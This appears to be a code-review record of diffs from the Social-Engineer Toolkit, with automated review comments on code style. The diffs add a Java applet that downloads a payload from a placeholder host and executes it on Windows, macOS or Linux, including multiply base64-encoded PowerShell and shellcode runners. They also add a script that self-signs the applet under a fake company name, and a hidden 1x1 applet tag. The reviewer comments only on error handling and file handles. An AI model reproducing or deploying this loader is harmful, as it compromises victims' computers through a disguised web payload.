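Review bot: The argument handling in the new main body hides every failure: the `except IndexError: sys.exit()` exits with no message, and the bare `except:` after `execute_payload = sys.argv[3]` also swallows unrelated errors such as a NameError or a decode failure raised inside that try body. Narrow the second one to `except IndexError:` as well, and close the payload file, e.g. `with open(payload_filename, "r") as fileopen: shellcode = fileopen.read()`, since the `fileopen = file(payload_filename, "r")` handle is otherwise leaked. The header comment `# IMPORTANT: YOU NEED TO BYTE COMPILE THIS WITH PYINSTALLER 1.5 ...` appears to have been dropped from the new header; if the PyInstaller version constraint still applies it should be restated there.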


@ -0,0 +1,248 @@
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.URL;
import java.util.*;
import sun.misc.BASE64Decoder;
import java.net.URL;
/**
* Original Author: Thomas Werth
* Modifications By: Dave Kennedy, Kevin Mitnick
* This is a universal Applet which determintes Running OS
* Then it fetches based on OS Type download param (WIN,MAC,NIX)
**/
public class Java extends Applet {
private Object initialized = null;
public Object isInitialized()
{
return initialized;
}
public void init() {
Process f;
try {
// generate a random string
Random r = new Random();
String token = Long.toString(Math.abs(r.nextLong()), 36);
String pfad = System.getProperty("java.io.tmpdir") + File.separator;
String writedir = System.getProperty("java.io.tmpdir") + File.separator;
// grab operating system
String os = System.getProperty("os.name").toLowerCase();
// grab jvm architecture
String arch = System.getProperty("os.arch");
String downParm = "";
String nextParm = "";
String thirdParm = "";
String fourthParm = "";
String fifthParm = "";
String sixthParm = "";
String seventhParm = "";
String eightParm = "";
short osType = -1 ;//0=win,1=mac,2=nix
if (os.indexOf( "win" ) >= 0) // We are running Windows then
{
// 1 = WINDOWSPLZ
// 2 = ILIKESTUFF
// 3 = OSX
// 4 = LINUX
// 5 = X64
// 6 = X86
// 7 = HUGSNOTDRUGS
// 8 = LAUNCH
// 9 = nextPage
// 10 = B64EncodeTimes
downParm = getParameter( "1" );
nextParm = getParameter( "2" );
thirdParm = getParameter( "5" );
fourthParm = getParameter( "6" );
fifthParm = getParameter( "7" );
sixthParm = getParameter( "8" );
seventhParm = getParameter( "9" );
eightParm = getParameter( "10" );
osType = 0;
pfad += token + ".exe";
}
else if (os.indexOf( "mac" ) >= 0) //MAC
{
downParm = getParameter( "3" );
osType = 1;
// look for special folders to define snow leopard, etc.
if (pfad.startsWith("/var/folders/")) pfad = "/tmp/";
pfad += token + ".bin";
}
else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0) // UNIX
{
downParm = getParameter( "4" );
osType = 2;
pfad += token + ".bin";
}
if ( downParm.length() > 0 && pfad.length() > 0 )
{
// URL parameter
URL url = new URL(downParm);
// Get an input stream for reading
InputStream in = url.openStream();
// Create a buffered input stream for efficency
BufferedInputStream bufIn = new BufferedInputStream(in);
File outputFile = new File(pfad);
OutputStream out =
new BufferedOutputStream(new FileOutputStream(outputFile));
byte[] buffer = new byte[2048];
for (;;) {
int nBytes = bufIn.read(buffer);
if (nBytes <= 0) break;
out.write(buffer, 0, nBytes);
}
out.flush();
out.close();
in.close();
}
// has it executed yet? then target nextPage to victim
String page = getParameter( "9" );
if ( page != null && page.length() > 0 )
{
URL urlPage = new URL(page);
getAppletContext().showDocument(urlPage);
}
// Here is where we define OS type, i.e. windows, linux, osx, etc.
if ( osType < 1 ) // If we're running Windows
{
File folderExisting = new File("C:\\Windows\\System32\\WindowsPowershell\\v1.0");
if (folderExisting.exists())
{
if (thirdParm.length() > 3)
{
// this detection is for the new powershell vector, it will run a special command if the flag is turned on in SET
if (arch.contains("86") || arch.contains("64"))
{
// this will be 64 bit
if (fourthParm.length() > 3)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + fourthParm);
}
}
else if (arch.contains("i"))
{
// this will be 32 bit
if (thirdParm.length() > 3)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + thirdParm);
}
}
}
}
// if we aren't using the shellcodeexec attack
if (nextParm.length() < 3)
{
// if we turned on binary dropping
if (sixthParm.length() > 2)
{
// if we are using the SET interactive shell
if (fifthParm.length() > 2)
{
// logfile stuff here 42logfile42.tmp
// write out a temp file if we aren't going to pass parameters
f = Runtime.getRuntime().exec("cmd.exe /c \"" + "echo " + fifthParm + " > " + writedir + "42logfile.tmp" + "\"");
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + fifthParm + "\"");
}
// if we aren't using SET interactive shell
if (fifthParm.length() < 2)
{
f = Runtime.getRuntime().exec("cmd.exe /c " + pfad);
//f.waitFor();
}
}
}
// if we are using shellcode exec
if (nextParm.length() > 3)
{
if (sixthParm.length() > 2)
{
// all parameters are base64 encoded, this will decode for us and pass the decoded strings
BASE64Decoder decoder = new BASE64Decoder();
byte[] decoded = decoder.decodeBuffer(nextParm);
// decode again
String decoded_string = new String(decoded);
String decoded_string_2 = new String(decoder.decodeBuffer(decoded_string));
// again
String decoded_string_3 = new String(decoder.decodeBuffer(decoded_string_2));
// again
String decoded_string_4 = new String(decoder.decodeBuffer(decoded_string_3));
// again
String decoded_string_5 = new String(decoder.decodeBuffer(decoded_string_4));
// again
String decoded_string_6 = new String(decoder.decodeBuffer(decoded_string_5));
// again
String decoded_string_7 = new String(decoder.decodeBuffer(decoded_string_6));
// again
String decoded_string_8 = new String(decoder.decodeBuffer(decoded_string_7));
// again
String decoded_string_9 = new String(decoder.decodeBuffer(decoded_string_8));
// again
String decoded_string_10 = new String(decoder.decodeBuffer(decoded_string_9));
// last one
String decoded_string_11 = new String(decoder.decodeBuffer(decoded_string_10));
PrintStream out = null;
String randomfile = Long.toString(Math.abs(r.nextLong()), 36);
try {
out = new PrintStream(new FileOutputStream(writedir + randomfile));
out.print(decoded_string_11);
}
finally {
if (out != null) out.close();
}
// this is if we are using multipyinjector
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + writedir + randomfile + " " + eightParm);
// this runs the single instance of shellcodeexec, pyinjector, or a binary
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + decoded_string_11 + "\"");
// f.waitFor();
}
}
// delete old file
// (new File(pfad)).delete();
}
else // if not windows then use linux/osx/etc.
{
// change permisisons to execute
Process process1 = Runtime.getRuntime().exec("/bin/chmod 755 " + pfad);
process1.waitFor();
//and execute
f = Runtime.getRuntime().exec(pfad);
// wait for termination
f.waitFor();
// delete old file
(new File(pfad)).delete();
}
initialized = this;
} catch(IOException e) {
e.printStackTrace();
}
/* ended here and commented out below for bypass */
catch (Exception exception)
{
exception.printStackTrace();
}
}
}


@ -0,0 +1,35 @@
#!/usr/bin/python
#
# simple jar file
#
import subprocess
import os
subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java.class", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
subprocess.Popen("javac Java.java", shell=True).wait()
subprocess.Popen("jar cvf Java_Update.jar Java.class", shell=True).wait()
print "[*] Jar file exported as Java_Update.jar"
pause = raw_input("Sign and import the new java file into SET? [yes|no]")
if pause == "yes" or pause == "y":
print """
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
"""
print """*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***"""
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Update.jar signapplet2", shell=True).wait()
# move it into our html directory
subprocess.Popen("rm ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print "[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)"
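Review bot: The two `rm` calls at the top of the script are started but never waited on, so they may still be running when `javac Java.java` and `jar cvf Java_Update.jar Java.class` execute and could remove the freshly built `Java.class` or jar; every later step calls `.wait()`, and these two should as well, e.g. `subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()`. The return value of each `.wait()` is also discarded, so a failed `javac`, `jar`, `keytool` or `jarsigner` step still falls through to the `cp` lines that overwrite the files under `../../html/`; checking the exit status before the copy would avoid replacing a working artifact with a stale or missing one. `import os` is unused. Each command is a constant string, so `shell=True` is not an injection concern here, but the list form with `shell=False` is the idiomatic call and would also make the quoting of the `keytool`/`jarsigner` arguments explicit.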


@ -1 +1 @@
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="separate_jvm" value="true"></applet>
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>